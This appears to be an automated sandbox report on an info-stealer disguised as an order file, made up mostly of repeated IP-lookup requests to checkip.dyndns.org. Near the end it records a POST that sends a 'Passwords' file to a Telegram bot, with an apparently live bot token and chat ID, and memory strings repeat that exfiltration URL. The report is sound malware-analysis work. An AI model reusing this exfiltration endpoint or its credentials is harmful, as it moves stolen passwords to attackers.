                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd306fc847fe8dHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: RegAsm.exe, 00000001.00000002.4093830575.000000000325A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/aT
                Source: JB#40044 Order.exe, 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegAsm.exe, 00000001.00000002.4099019610.00000000066A0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: RegAsm.exe, 00000001.00000002.4093095692.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab%
                Source: RegAsm.exe, 00000001.00000002.4099019610.00000000066A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4eb3ea055b7f3
                Source: RegAsm.exe, 00000001.00000002.4093095692.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4099019610.00000000066A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?78b123b1c3694
                Source: RegAsm.exe, 00000001.00000002.4099019610.00000000066A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bd4b67fd6d000
                Source: RegAsm.exe, 00000001.00000002.4093095692.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabk
                Source: RegAsm.exe, 00000001.00000002.4093095692.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enp
                Source: RegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1baaaa8156
                Source: RegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?600bcff3de
                Source: RegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7771188c16
                Source: RegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?78b123b1c3
                Source: RegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bd4b67fd6d
                Source: RegAsm.exe, 00000001.00000002.4099019610.0000000006640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e712cc41fc
                Source: RegAsm.exe, 00000001.00000002.4093095692.0000000001591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                Source: RegAsm.exe, 00000001.00000002.4093095692.0000000001591000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ce
                Source: RegAsm.exe, 00000001.00000002.4101115316.0000000008D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oenN
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 00000001.00000002.4093830575.000000000325A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003286000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegAsm.exe, 00000001.00000002.4093830575.0000000003239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: JB#40044 Order.exe, 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: RegAsm.exe, 00000001.00000002.4093830575.00000000032DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088
                Source: JB#40044 Order.exe, 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4093830575.0000000003201000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
                Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
